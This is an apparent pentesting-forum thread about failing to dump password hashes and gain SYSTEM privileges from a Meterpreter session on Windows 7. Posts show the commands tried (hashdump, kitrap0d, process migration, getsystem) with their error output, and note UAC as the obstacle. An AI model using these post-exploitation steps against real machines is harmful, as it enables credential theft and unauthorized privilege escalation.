Results 1 to 4 of 4

Thread: unable to dump hashes in win7 with meterpreter

  1. #1
    Member
    Join Date
    Sep 2007
    Posts
    58

    Default unable to dump hashes in win7 with meterpreter

    I got a meterpreter session on a win7 box; however, I'm unable to use hashdump. I get insufficient privileges. So I tried to use the "keylogrecorder" script, but I need to migrate to winlogon.exe for that, and again, I'm unable to migrate due to insufficient prvs. I used "getprivs," and then tried again with same results. I noticed that "getsystem" is not avaiable.... the user that I got my meterpreter session is member of the admin group, yet I'm not able to get any of this command working. I konw in vista there's the UAC, which can be turned off, but I'm not aware of this in Win7...... any help appreciated

    thanks

  2. #2
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default Re: unable to dump hashes in win7 with meterpreter

    Carried the extension priv?

    Code:
    meterpreter> use priv
    ..snip..
    Code:
    meterpreter> hashdump
    ...snip...
    or

    Code:
    meterpreter> run hashdump
    ..snip...
    Try too.

    Code:
    meterpreter> run kitrap0d
    ...snip...
    Regards,
    (gdb) disass m(y_br)ain

    ®

  3. #3
    Member
    Join Date
    Sep 2007
    Posts
    58

    Default Re: unable to dump hashes in win7 with meterpreter

    Code:
    meterpreter > use priv
    Loading extension priv...success.

    Code:
    meterpreter > run hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY b9106b7575965755275b237fe2b54acd...
    [-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_create_key: Operation failed: 5
    [-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
    meterpreter >
    I try to migrate to a service process, but it would not let me. by the way this does not work with "explorer.exe" needs to be a process running under "system"

    Code:
    meterpreter > run kitrap0d[*] Currently running as vista-vbox\jorge
    [*] Loading the vdmallowed executable and DLL from the local system...[*] Uploading vdmallowed to C:\Users\jorge\AppData\Local\Temp\pWEXvURb.exe...[*] Uploading vdmallowed to C:\Users\jorge\AppData\Local\Temp\vdmexploit.dll...[*] Escalating our process (PID:3848)...
    and kitrap0d terminated my meterpreter session, it restarted the box!

    by the way UAC does exist in Win7...Forgot!.... and I read somewhere there is a script to turn it off...

  4. #4
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: unable to dump hashes in win7 with meterpreter

    anyone actually get this to work? I have seen things on the webs saying "it works" but I have not seen that. with a win7 install on vmware I am not able to get system privs at all, and kitrap0d will blue screen the system most times

    however any attempt to run escalation is no go.

    has anyone successfully used meterpreter to escalate to system on a retail build of windows7 (wondering if I am stumped or missing something easy)
    Code:
    meterpreter > sysinfo
    Computer: WIN-MSUB6TKFKFA
    OS      : Windows 7 (Build 7600, ).
    Arch    : x86
    Language: en_US
    meterpreter > ps
    ...
    608   explorer.exe         x86   1        WIN-MSUB6TKFKFA\user  C:\Windows\Explorer.EXE
    meterpreter > migrate 608[*] Migrating to 608...[*] Migration completed successfully.
    meterpreter > getprivs
    ============================================================
    Enabled Process Privileges
    ============================================================
      SeShutdownPrivilege
      SeChangeNotifyPrivilege
      SeUndockPrivilege
    meterpreter > getsystem -t 1
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 2
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 3
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 4
    ^C[-] Error running command getsystem: Interrupt
    update: this is UAC blocking access, with UAC disabled this is no longer an issue, I am still stuck on how to disable UAC..?
    Last edited by spudgunman; 12-01-2010 at 06:53 AM.

Similar Threads

  1. Replies: 1
    Last Post: 04-19-2009, 03:41 AM
  2. Dump remote SAM from within metasploit?
    By Dissident85 in forum OLD Pentesting
    Replies: 6
    Last Post: 09-20-2008, 08:34 AM
  3. Kismet dump file
    By dumbNlazy in forum OLD Newbie Area
    Replies: 5
    Last Post: 07-26-2008, 10:20 PM
  4. rf dump/ hacking tutorials
    By andy1 in forum OLD BackTrack v2.0 Final
    Replies: 0
    Last Post: 07-25-2007, 04:52 PM
  5. Catch PKS Hashes possible??
    By -=Xploitz=- in forum OLD Newbie Area
    Replies: 6
    Last Post: 06-18-2007, 02:57 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •